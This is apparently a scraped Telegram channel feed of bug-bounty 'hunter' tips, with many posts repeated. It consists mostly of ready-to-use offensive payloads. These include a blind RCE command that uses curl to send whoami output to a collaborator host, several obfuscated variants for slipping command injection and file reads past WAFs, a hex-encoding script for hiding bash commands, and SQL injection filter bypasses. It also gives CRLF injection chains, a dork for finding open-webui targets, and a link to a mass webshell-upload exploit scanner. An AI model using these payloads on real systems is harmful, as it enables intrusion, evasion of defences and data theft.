Hey Hunter’s,
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Others format you might try:
curl
curl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check
Now you hit follow me for more: x.com/darkshadow2bd
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Others format you might try:
curl
whoami.BURP_LINKcurl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check
User-Agent Header in your burp collaborator responds, if here you got curl means RCE.Now you hit follow me for more: x.com/darkshadow2bd
1🔥24❤6🗿6👍3
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know guy's you all wants more or not like that?
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know guy's you all wants more or not like that?
1❤14😱11🔥6👍2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? ❌ cat /etc/hosts ✅ tac /e\t\c/h\o\s\t\s ✅ tac${IFS}/e\t\c/h\o\s\t\s ✅ tac /e*c/h*st* ✅ tac /e{t,c}*/{o…
This is for copy cats who copy my posts and share without cradit:
~DarkShadow
Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.
~DarkShadow
1🤝9❤5🫡4🔥2🗿2
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
👍5
Check out this job at National Cyber Security Services: https://www.linkedin.com/jobs/view/4340448773
Linkedin
National Cyber Security Services hiring Security monitoring & incident response in Kolkata, West Bengal, India | LinkedIn
Posted 8:21:00 AM. SIEM Engineer (Open-Source & Enterprise) – SOC Deployment & TuningWe’re looking for a SIEM Engineer…See this and similar jobs on LinkedIn.
❤4
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!
#bugbountytips #bypass
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")
hex=$(printf '%02x' "$ascii")
out="${out}\\x${hex}"
done
echo "$'$out'"
Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!
#bugbountytips #bypass
🫡18🔥7❤5
⚡️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogic
#infosec #cybersec #bugbountytips
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`#infosec #cybersec #bugbountytips
❤11
Hey Hunter’s,
DarkShadow is here back again!
Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.
👇🏻Like:
parameter=value id
Now Guys simply show your love ❤️
#bugbountytips #rce
DarkShadow is here back again!
Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.
👇🏻Like:
parameter=value id
Now Guys simply show your love ❤️
#bugbountytips #rce
❤20🔥7
🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
✅ Bypass Payload
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
✅Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
✅Credit: @nav1n0x
1❤11👍2
Het Hunter's,
DarkShadow here back again!
✅CRLF injection Explain🔥
☠️Impact (it can chain with):
1. XSS
2. open redirection
3. Cache Poisoning
4. Session Fixation [Inject custom Set-Cookie: eaders]
5. Inject Access-Control-Allow-Origin: * [make CORS]
6. CORS bypass to Sensitive Info Leak
7. Web Cache Deception
8. Phishing via Responds manipulation [\r\n\r\n<h1>Hacked</h1>]
Now Guy's show your love ❤️
#bugbountytips #crlf
DarkShadow here back again!
✅CRLF injection Explain🔥
This vulnerability allow an attacker to add there custom header on the responds! If you can inject \r\n.
☠️Impact (it can chain with):
1. XSS
2. open redirection
3. Cache Poisoning
4. Session Fixation [Inject custom Set-Cookie: eaders]
5. Inject Access-Control-Allow-Origin: * [make CORS]
6. CORS bypass to Sensitive Info Leak
7. Web Cache Deception
8. Phishing via Responds manipulation [\r\n\r\n<h1>Hacked</h1>]
Now Guy's show your love ❤️
#bugbountytips #crlf
❤31👍2
ATO/RCE
👇Dork
HUNTER : product.name="open-webui"
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12
Hey,
if you feel anything here could be improved, drop your suggestion please :)
if you feel anything here could be improved, drop your suggestion please :)
🤝15
Hey Hunter's,
DarkShadow here back again!
if you ever got a LFI vector parameter, then not just try LFI payloads.
Parameter: &Path= ❎LFI ✅RCE
Payload for RCE: "|id||"
#bugbountytips #rce
DarkShadow here back again!
if you ever got a LFI vector parameter, then not just try LFI payloads.
Parameter: &Path= ❎LFI ✅RCE
Payload for RCE: "|id||"
#bugbountytips #rce
❤18🔥8
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
🔗 https://github.com/kevin-mizu/domloggerpp
Check it out! 👇
🔗 https://github.com/kevin-mizu/domloggerpp
🔥7❤3